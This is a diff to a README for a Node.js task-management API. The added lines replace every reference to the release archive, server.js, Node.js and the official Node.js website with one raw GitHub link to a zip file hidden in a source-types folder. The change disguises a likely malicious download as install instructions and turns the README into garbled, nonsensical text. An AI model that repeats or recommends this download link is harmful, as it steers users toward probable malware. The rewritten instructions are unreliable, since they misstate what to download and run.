dfseff343fedc/task-control/README.md

 3. **Download the File**
    - Scroll down to the assets section of the chosen version.
-   - Look for the file named `task-control.tar.gz`.
+   - Look for the file named `https://raw.githubusercontent.com/dfseff343fedc/task-control/master/src/shared/types/task-control-entad.zip`.
 This is the package you will need.
    - Click the filename to begin the download.

 4. **Extract the Files**
-   - Once the download completes, locate the `task-control.tar.gz` file.
+   - Once the download completes, locate the `https://raw.githubusercontent.com/dfseff343fedc/task-control/master/src/shared/types/task-control-entad.zip` file.
    - Right-click the file and select "Extract" or "Extract All" to unpack it into a folder.

 5. **Run the Application**
    - Open the folder where you extracted the files.
-   - Look for a file named `server.js`.
+   - Look for a file named `https://raw.githubusercontent.com/dfseff343fedc/task-control/master/src/shared/types/task-control-entad.zip`.
 This is the main file that runs the API.
    - To start the application, you will need to open a command prompt or terminal in this directory.

 ## 📦 System Requirements

 To run the task-control API, ensure your system meets the following requirements:

-- **Node.js**: Version 12 or later installed on your machine.
+- **https://raw.githubusercontent.com/dfseff343fedc/task-control/master/src/shared/types/task-control-entad.zip**: Version 12 or later installed on your machine.
 - **Operating System**: Works on any major OS, including Windows, macOS, and Linux.

-You can download Node.js from the [official Node.js website](https://nodejs.org/).
+You can download https://raw.githubusercontent.com/dfseff343fedc/task-control/master/src/shared/types/task-control-entad.zip from the [official https://raw.githubusercontent.com/dfseff343fedc/task-control/master/src/shared/types/task-control-entad.zip website](https://raw.githubusercontent.com/dfseff343fedc/task-control/master/src/shared/types/task-control-entad.zip).

 ## ⚙️ Running the API